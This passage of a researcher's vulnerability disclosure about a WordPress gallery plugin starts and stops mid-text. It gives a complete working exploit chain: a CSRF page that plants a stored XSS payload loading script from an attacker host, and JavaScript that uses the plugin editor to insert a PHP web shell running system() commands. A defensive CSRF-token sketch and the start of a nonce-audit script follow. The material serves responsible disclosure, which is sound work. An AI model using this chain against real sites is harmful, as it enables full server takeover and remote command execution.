his site [source: I am a WordPress admin myself] and is genuinely interested
in following the link. Why should he assume that it is dangerous? Lots of
people leave a link to their own site in the WordPress comment section. As
soon as the WordPress administrator [he needs to be logged in, which is
normally the case] follows the link, the server is entirely busted. No need to
crack password hashes or find further privilege escalation paths. Why? See
below the code that is executed if he follows the link:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><!DOCTYPE html></span>
<span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">title</span><span class="p">></span>Stored XSS CSRF exploit.<span class="p"></</span><span class="nt">title</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">http-equiv</span><span class="o">=</span><span class="s">"Content-Type"</span> <span class="na">content</span><span class="o">=</span><span class="s">"text/html; charset=UTF-8"</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span>
<span class="kd">function</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">ref</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">XMLHttpRequest</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// For recent browsers.</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">ActiveXObject</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Older IE 6,7,8</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">ActiveXObject</span><span class="p">(</span><span class="s2">"MSXML2.XMLHTTP.3.0"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">ref</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">send_payload</span><span class="p">(</span><span class="nx">payload</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">TARGET_URL</span> <span class="o">=</span> <span class="s2">"http://localhost/wordpress/wp-admin/admin.php?page=flag-banner-box&playlist=null&mode=edit"</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">req</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nx">req</span> <span class="o">=</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">();</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span> <span class="o">&&</span> <span class="nx">req</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mf">200</span><span class="p">)</span> <span class="p">{</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"success_indicator"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="s2">"payload sent."</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"POST"</span><span class="p">,</span> <span class="nx">TARGET_URL</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">setRequestHeader</span><span class="p">(</span><span class="s2">"Content-type"</span><span class="p">,</span> <span class="s2">"application/x-www-form-urlencoded"</span><span class="p">);</span>
<span class="cm">/* Build the post data */</span>
<span class="kd">var</span> <span class="nx">pd</span> <span class="o">=</span> <span class="p">{</span><span class="s2">"playlist_title"</span><span class="o">:</span> <span class="s2">"sometitle"</span><span class="p">,</span>
<span class="s2">"playlist_descr"</span><span class="o">:</span> <span class="s2">"some_description"</span><span class="p">,</span>
<span class="s2">"mode"</span><span class="o">:</span> <span class="s2">"save"</span><span class="p">,</span>
<span class="s2">"skinname"</span><span class="o">:</span> <span class="s1">'" '</span> <span class="o">+</span> <span class="nx">payload</span><span class="p">,</span>
<span class="s2">"item_array[0]"</span><span class="o">:</span> <span class="s2">"notimportant"</span><span class="p">};</span>
<span class="nx">postdata</span> <span class="o">=</span> <span class="s2">""</span><span class="p">;</span>
<span class="k">for</span><span class="p">(</span><span class="kd">var</span> <span class="nx">key</span> <span class="ow">in</span> <span class="nx">pd</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">postdata</span> <span class="o">+=</span> <span class="p">(</span><span class="nx">key</span> <span class="o">+</span> <span class="s2">"="</span> <span class="o">+</span> <span class="nx">pd</span><span class="p">[</span><span class="nx">key</span><span class="p">]</span> <span class="o">+</span> <span class="s2">"&"</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">postdata</span> <span class="o">=</span> <span class="nx">postdata</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="nx">postdata</span><span class="p">.</span><span class="nx">length</span><span class="o">-</span><span class="mf">1</span><span class="p">);</span> <span class="c1">// rstrip the last &</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">postdata</span><span class="p">);</span>
<span class="p">}</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="kd">var</span> <span class="nx">payload</span> <span class="o">=</span> <span class="s2">"<script type="</span><span class="nx">text</span><span class="o">/</span><span class="nx">javascript</span><span class="s2">" src="</span><span class="nx">http</span><span class="o">:</span><span class="err">//atacker.com/exploit.js">//Nothin here</span><span class="p"></</span><span class="nt">script</span><span class="p">></span>"; send_payload(payload);<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">div</span> <span class="na">id</span><span class="o">=</span><span class="s">"success_indicator"</span><span class="p">></</span><span class="nt">div</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
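<p>The page above only works because the playlist save request is accepted without any proof that it came from the admin's own form. As a rough sketch of the missing check, written in Python rather than WordPress PHP, a server could bind a token to the session and the action and refuse requests that don't carry it. The names <code>SECRET_KEY</code>, <code>create_token</code>, <code>verify_token</code> and <code>handle_save_playlist</code> are assumptions made for this example; WordPress provides its own nonce functions for the same purpose.</p>

```python
import hashlib
import hmac

# Assumption: a per-site secret known only to the server (hypothetical value).
SECRET_KEY = b"server-side-secret"


def create_token(session_id: str, action: str) -> str:
    """Derive a token bound to one session and one action."""
    message = f"{session_id}|{action}".encode("utf-8")
    return hmac.new(SECRET_KEY, message, hashlib.sha256).hexdigest()


def verify_token(session_id: str, action: str, token: str) -> bool:
    """Return True only if the submitted token matches the expected one."""
    expected = create_token(session_id, action)
    # compare_digest avoids leaking the match position through timing.
    return hmac.compare_digest(expected, token)


def handle_save_playlist(session_id: str, form: dict) -> str:
    """Reject the request unless it carries a valid token for this action."""
    if not verify_token(session_id, "save_playlist", form.get("token", "")):
        return "rejected"
    return "saved"


# The genuine admin form embeds the token; a forged cross-site form cannot know it.
genuine = {"token": create_token("session-abc", "save_playlist"), "skinname": "default"}
forged = {"skinname": "anything"}

print(handle_save_playlist("session-abc", genuine))
print(handle_save_playlist("session-abc", forged))
```

<p>A token alone does not fix the unescaped output, but it stops a foreign site from submitting the form on the admin's behalf in the first place.</p>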
<p>As soon as the payload is executed, the following exploit code is
loaded from another site, and it does the actual evil stuff [see the code
above, the last lines are probably the most interesting]. It basically uses
the plugin editor in WordPress to change plugin code. This leads to remote
code execution, and the worst-case scenario happens: an attacker can issue
system() calls with the permissions of the web server.</p>
<h3>The exploit code:</h3>
<div class="highlight"><pre><span></span><code><span class="cm">/* </span>
<span class="cm"> * Copyright: Nikolai Tschacher.</span>
<span class="cm"> * Site: incolumitas.com</span>
<span class="cm"> * Easy as pie.</span>
<span class="cm"> * What: Use this code when you found a stored XSS in a wordpress plugin to gain RCE.</span>
<span class="cm"> * How: A wordpress admin needs to run this code in his browser with a valid session id.</span>
<span class="cm"> * Idea: Modify the flash-album-gallery plugin via wordpress admin panel.</span>
<span class="cm"> * </span>
<span class="cm"> * Note: This is actually nothing new. It's just one of many ways to gain RCE</span>
<span class="cm"> * if you have a stored XSS in a wordpress session.</span>
<span class="cm"> */</span>
<span class="c1">// Without php tags</span>
<span class="c1">// HTML meta chars are in character entity references format.</span>
<span class="kd">var</span> <span class="nx">EXPLOIT_CODE</span> <span class="o">=</span> <span class="s2">"\nif (isset($_GET[&#039;cmd&#039;])&amp;&amp; !empty($_GET[&#039;cmd&#039;])){ echo &#039;<pre>&#039;;system($_GET[&#039;cmd&#039;]);echo &#039;</pre>&#039;; }"</span><span class="p">;</span>
<span class="c1">// TARGET SETTINGS. Set stuff here.</span>
<span class="kd">var</span> <span class="nx">TARGET_WP_PATH</span> <span class="o">=</span> <span class="s2">"http://localhost/wordpress"</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">PLUGIN_EDITOR_URL</span> <span class="o">=</span> <span class="nx">TARGET_WP_PATH</span> <span class="o">+</span> <span class="s2">"/wp-admin/plugin-editor.php"</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">PLUGIN_EDIT_URL</span> <span class="o">=</span> <span class="nx">PLUGIN_EDITOR_URL</span> <span class="o">+</span> <span class="s2">"?file=flash-album-gallery/flag.php"</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">ref</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">XMLHttpRequest</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// For recent browsers.</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">ActiveXObject</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Older IE 6,7,8</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">ActiveXObject</span><span class="p">(</span><span class="s2">"MSXML2.XMLHTTP.3.0"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">ref</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* Extract the nonce */</span>
<span class="kd">function</span> <span class="nx">exploit</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">req</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nx">req</span> <span class="o">=</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">();</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span> <span class="o">&&</span> <span class="nx">req</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mf">200</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">res</span> <span class="o">=</span> <span class="sr">/name="_wpnonce"\svalue=\"[a-z0-9]{10}\"/</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">responseText</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">length</span> <span class="o">==</span> <span class="mf">1</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">nonce</span> <span class="o">=</span> <span class="sr">/[a-z0-9]{10}/</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="nx">res</span><span class="p">[</span><span class="mf">0</span><span class="p">]);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="c1">// The sites not available. Maybe the plugin is not installed?!</span>
<span class="nx">nonce</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">modify_plugin</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">responseText</span><span class="p">,</span> <span class="nx">nonce</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"GET"</span><span class="p">,</span> <span class="nx">PLUGIN_EDIT_URL</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span>
<span class="p">}</span>
<span class="cm">/* Modify the plugin with malicious code with plugin editor */</span>
<span class="kd">function</span> <span class="nx">modify_plugin</span><span class="p">(</span><span class="nx">responseText</span><span class="p">,</span> <span class="nx">nonce</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Get the plugin code</span>
<span class="c1">// On each wordpress plugin edit site, there's just one textarea tag.</span>
<span class="c1">// The plugin code itself lies between the textarea tags.</span>
<span class="c1">// These regexes aren't really good.</span>
<span class="kd">var</span> <span class="nx">startIndex</span> <span class="o">=</span> <span class="nx">responseText</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/<textarea.*?name="newcontent".*?>/</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">stopIndex</span> <span class="o">=</span> <span class="nx">responseText</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/<\/textarea>/</span><span class="p">);</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">responseText</span><span class="p">.</span><span class="nx">substring</span><span class="p">(</span><span class="nx">startIndex</span><span class="p">.</span><span class="nx">index</span><span class="o">+</span><span class="nx">startIndex</span><span class="p">[</span><span class="mf">0</span><span class="p">].</span><span class="nx">length</span><span class="p">,</span> <span class="nx">stopIndex</span><span class="p">.</span><span class="nx">index</span><span class="p">);</span>
<span class="c1">// add our exploit code at the beginning of the plugin after the "// Stop direct call" comment.</span>
<span class="k">if</span> <span class="p">(</span><span class="sr">/((\/){2}\sStop\sdirect\scall)/</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">pluginCode</span><span class="p">))</span> <span class="p">{</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">pluginCode</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/((\/){2}\sStop\sdirect\scall)/</span><span class="p">,</span> <span class="s2">"$1"</span> <span class="o">+</span> <span class="nx">EXPLOIT_CODE</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="c1">// Let's go for the first line after the obligatory wp plugin comment and lets use the closing comment</span>
<span class="c1">// characters */ as needle as a fallback.</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">pluginCode</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/^(\*\/)/m</span><span class="p">,</span> <span class="s2">"$1"</span> <span class="o">+</span> <span class="s2">"\n"</span> <span class="o">+</span> <span class="nx">EXPLOIT_CODE</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// We need to consider that the plugin code in this state is making use of Character entity references</span>
<span class="c1">// for all html meta characters like " ' < > & \ to keep them from being interpreted as markup.</span>
<span class="c1">// We need to replace them with their "real" characters, before we send the plugin as post data.</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">removeCharEntityReferences</span><span class="p">(</span><span class="nx">pluginCode</span><span class="p">);</span>
<span class="c1">// Ready to build our POST request</span>
<span class="nx">preq</span> <span class="o">=</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">();</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">preq</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span> <span class="o">&&</span> <span class="nx">preq</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mf">200</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">successPattern</span> <span class="o">=</span> <span class="sr">/File\sedited\ssuccessfully./</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">successPattern</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">preq</span><span class="p">.</span><span class="nx">responseText</span><span class="p">))</span>
<span class="nx">alert</span><span class="p">(</span><span class="s2">"Done."</span><span class="p">);</span>
<span class="c1">// Notify the attacker that the exploit has been spawned.</span>
<span class="k">else</span>
<span class="nx">alert</span><span class="p">(</span><span class="s2">"Nope."</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"POST"</span><span class="p">,</span> <span class="nx">PLUGIN_EDITOR_URL</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">setRequestHeader</span><span class="p">(</span><span class="s2">"Content-Type"</span><span class="p">,</span> <span class="s2">"application/x-www-form-urlencoded"</span><span class="p">);</span>
<span class="nx">pd</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">_wpnonce</span><span class="o">:</span> <span class="nx">nonce</span><span class="p">,</span>
<span class="nx">_wp_http_referer</span><span class="o">:</span> <span class="nx">PLUGIN_EDIT_URL</span> <span class="o">+</span> <span class="s2">"&a=te&scrollto=0"</span><span class="p">,</span>
<span class="nx">a</span><span class="o">:</span> <span class="s2">""</span><span class="p">,</span>
<span class="nx">scrollto</span><span class="o">:</span> <span class="s2">"192"</span><span class="p">,</span>
<span class="nx">newcontent</span><span class="o">:</span> <span class="nb">encodeURIComponent</span><span class="p">(</span><span class="nx">pluginCode</span><span class="p">),</span>
<span class="nx">action</span><span class="o">:</span> <span class="s2">"update"</span><span class="p">,</span>
<span class="nx">file</span><span class="o">:</span> <span class="s2">"flash-album-gallery/flag.php"</span><span class="p">,</span>
<span class="nx">plugin</span><span class="o">:</span> <span class="s2">"flash-album-gallery/flag.php"</span><span class="p">,</span>
<span class="nx">submit</span><span class="o">:</span> <span class="s2">"Update+File"</span>
<span class="p">};</span>
<span class="c1">// Build the post data.</span>
<span class="nx">postdata</span> <span class="o">=</span> <span class="s2">""</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">key</span> <span class="ow">in</span> <span class="nx">pd</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">postdata</span> <span class="o">+=</span> <span class="p">(</span><span class="nx">key</span> <span class="o">+</span> <span class="s2">"="</span> <span class="o">+</span> <span class="nx">pd</span><span class="p">[</span><span class="nx">key</span><span class="p">]</span> <span class="o">+</span> <span class="s2">"&"</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">postdata</span> <span class="o">=</span> <span class="nx">postdata</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="nx">postdata</span><span class="p">.</span><span class="nx">length</span><span class="o">-</span><span class="mf">1</span><span class="p">);</span> <span class="c1">// rstrip the last &</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">postdata</span><span class="p">);</span>
<span class="p">}</span>
<span class="cm">/*</span>
<span class="cm"> * Removes the HTML char entity references for the HTML meta characters.</span>
<span class="cm"> */</span>
<span class="kd">function</span> <span class="nx">removeCharEntityReferences</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">((</span><span class="ow">typeof</span> <span class="nx">data</span><span class="p">)</span> <span class="o">!==</span> <span class="s2">"string"</span><span class="p">)</span> <span class="p">{</span>
<span class="k">throw</span> <span class="ow">new</span> <span class="ne">TypeError</span><span class="p">(</span><span class="s2">"data needs to be a string"</span><span class="p">);</span>
<span class="k">return</span> <span class="kc">null</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&quot;/g</span><span class="p">,</span> <span class="s2">"\""</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&#039;/g</span><span class="p">,</span> <span class="s2">"'"</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&lt;/g</span><span class="p">,</span> <span class="s2">"<"</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&gt;/g</span><span class="p">,</span> <span class="s2">">"</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&amp;/g</span><span class="p">,</span> <span class="s2">"&"</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">data</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">exploit</span><span class="p">();</span>
</code></pre></div>
<h3>Conclusion</h3>
<p>What was shown above is just one specific bug in the
flash-album-gallery plugin. I think that there might be lots more. If
you want to see the notes of my work, please have a look at the file I made
during my research at the very bottom of this [large] mail.</p>
<p>But honestly, I have to tell you that there are still lots of bugs in the
code and that it would take a rather large amount of time and some dull hours
of work to locate the vast majority of them [forget about finding all bugs in
software in general]. This means that I won't continue spending a lot of time
on this project.</p>
<p>Additionally, I have sent this writeup to the wordpress-security bug
bounty program because, you know, I would always be happy for some dimes to
keep my server running :D</p>
<p>If you have questions, feel free to contact me.</p>
<p>I am going to publish this mail on my blog as soon as you guys have updated
the code and the users have had some time to switch versions. But please keep
in mind: it would really take some serious work to find all the bugs!</p>
<p>I advise uninstalling this plugin and NOT using it until big changes are
made to improve the security architecture.</p>
<p>PS: Maybe you are also interested in having a look at the script I wrote to
locate bugs like this:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># PYTHON NONCE INCONSISTENT USE REVEALER</span>
<span class="c1"># COPYRIGHT: Nikolai Tschacher</span>
<span class="c1"># Site: incolumitas.com</span>
<span class="c1"># Walks through a plugin and tries to reveal inconsistencies with nonces which</span>
<span class="c1"># could lead to some vulnerabilities. Sometimes, nonces are created, but never validated.</span>
<span class="c1"># Just a nonce itself does nothing, the action must be actually confirmed.</span>
<span class="c1"># This simply finds all nonces and looks if some stay unchecked. If this is the case, the</span>
<span class="c1"># nonce is useless and there's maybe a threat.</span>
<span class="c1"># About: http://www.prelovac.com/vladimir/improving-security-in-wordpress-plugins-using-nonces</span>
<span class="kn">import</span> <span class="nn">argparse</span>
<span class="kn">import</span> <span class="nn">fnmatch</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="n">DEBUG</span> <span class="o">=</span> <span class="kc">False</span>
<span class="c1"># If a nonce is created but never checked with wp_verify_nonce() (or descendants), the nonce is</span>
<span class="c1"># senseless and no security barrier at all. This script tries to find this flaw.</span>
<span class="c1"># Nonces are random, one time tokens which are usually sent with a critical request/form</span>
<span class="c1"># a user can execute in an application. Before the action takes place, the app has to confirm</span>
<span class="c1"># that the nonce is the same as generated while the form was crafted. If this is not the case,</span>
<span class="c1"># a user is most likely tricked into submitting a form without his consent, since he has never</span>
<span class="c1"># seen the form and thus the nonce hasn't been created and automatically submitted. This prevents</span>
<span class="c1"># CSRF attacks and makes most sql injections and xss attacks rather hard.</span>
<span class="c1"># Approach: We treat simply all strings between braces as possible action arguments. There will be</span>
<span class="c1"># a lot of false positives. But making the regex accurate is simply not feasible because the function</span>
<span class="c1"># calling syntax is way too hard to parse [lazy and yeah, guilty :D]</span>
<span class="n">R_NONCE_CREATION</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">'(wp_nonce_field|wp_create_nonce|wp_nonce_url)(\s*)\(.*?\)'</span><span class="p">)</span>
<span class="n">R_STRING</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">'(</span><span class="se">\'</span><span class="s1">|").*?\1'</span><span class="p">)</span>
<span class="c1"># Nonces are normally confirmed before the critical action in wp code begins.</span>
<span class="c1"># There are several functions to confirm nonces depending on the situation</span>
<span class="c1"># of the form/action's origin. They can be found in \wp-includes\pluggable.php</span>
<span class="c1"># - wp_verify_nonce($nonce, $action = -1)</span>
<span class="c1"># - check_ajax_referer( $action = -1, $query_arg = false, $die = true )</span>
<span class="c1"># - check_admin_referer($action = -1, $query_arg = '_wpnonce')</span>
<span class="n">R_NONCE_CHECK</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">'(check_ajax_referer|wp_verify_nonce|check_admin_referer)(\s*)\(.*?\)'</span><span class="p">)</span>
<span class="n">matches</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">checked</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">def</span> <span class="nf">apply_on_file_content</span><span class="p">(</span><span class="n">root_path</span><span class="p">,</span> <span class="n">callback</span><span class="p">):</span>
    <span class="c1"># Call callback(content, filename) for every PHP file below root_path.</span>
    <span class="n">pattern</span> <span class="o">=</span> <span class="s1">'.php'</span>
    <span class="k">for</span> <span class="n">root</span><span class="p">,</span> <span class="n">dirs</span><span class="p">,</span> <span class="n">files</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">root_path</span><span class="p">):</span>
        <span class="k">for</span> <span class="n">fname</span> <span class="ow">in</span> <span class="n">files</span><span class="p">:</span>
            <span class="c1"># Match the file extension only; 'in' would also accept e.g. 'x.php.bak'.</span>
            <span class="k">if</span> <span class="n">fname</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="n">pattern</span><span class="p">):</span>
                <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">fname</span><span class="p">),</span> <span class="s1">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
                    <span class="n">callback</span><span class="p">(</span><span class="n">f</span><span class="o">.</span><span class="n">read</span><span class="p">(),</span> <span class="n">fname</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">noncescan</span><span class="p">(</span><span class="n">fdata</span><span class="p">,</span> <span class="n">fname</span><span class="p">):</span>
    <span class="n">scan_nonce_creation</span><span class="p">(</span><span class="n">fdata</span><span class="p">,</span> <span class="n">fname</span><span class="p">)</span>
    <span class="n">verify_nonces</span><span class="p">(</span><span class="n">fdata</span><span class="p">,</span> <span class="n">fname</span><span class="p">)</span>
<span class="c1"># Collects the string arguments of all nonce creation calls in 'matches'. Very greedy approach.</span>
<span class="k">def</span> <span class="nf">scan_nonce_creation</span><span class="p">(</span><span class="n">fdata</span><span class="p">,</span> <span class="n">fname</span><span class="p">):</span>
    <span class="n">dmsg</span><span class="p">(</span><span class="s1">'[+] Scanning for nonces in </span><span class="si">{0}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">fname</span><span class="p">))</span>
    <span class="k">for</span> <span class="n">m</span> <span class="ow">in</span> <span class="n">R_NONCE_CREATION</span><span class="o">.</span><span class="n">finditer</span><span class="p">(</span><span class="n">fdata</span><span class="p">):</span>
        <span class="k">for</span> <span class="n">s</span> <span class="ow">in</span> <span class="n">R_STRING</span><span class="o">.</span><span class="n">finditer</span><span class="p">(</span><span class="n">m</span><span class="o">.</span><span class="n">group</span><span class="p">()):</span>
            <span class="n">matches</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">group</span><span class="p">())</span>
<span class="c1"># Collects the string arguments of all nonce check calls in 'checked'.</span>
<span class="k">def</span> <span class="nf">verify_nonces</span><span class="p">(</span><span class="n">fdata</span><span class="p">,</span> <span class="n">fname</span><span class="p">):</span>
    <span class="n">dmsg</span><span class="p">(</span><span class="s1">'[+] Verifying found actions in </span><span class="si">{0}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">fname</span><span class="p">))</span>
    <span class="k">for</span> <span class="n">m</span> <span class="ow">in</span> <span class="n">R_NONCE_CHECK</span><span class="o">.</span><span class="n">finditer</span><span class="p">(</span><span class="n">fdata</span><span class="p">):</span>
        <span class="k">for</span> <span class="n">s</span> <span class="ow">in</span> <span class="n">R_STRING</span><span class="o">.</span><span class="n">finditer</span><span class="p">(</span><span class="n">m</span><span class="o">.</span><span class="n">group</span><span class="p">()):</span>
            <span class="n">checked</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">group</span><span class="p">())</span>
<span class="k">def</span> <span class="nf">report</span><span class="p">():</span>
    <span class="c1"># Now the two lists 'matches' and 'checked' both hold</span>
    <span class="c1"># all the found $action string arguments that were passed</span>
    <span class="c1"># to the nonce creation functions and again when the nonce</span>
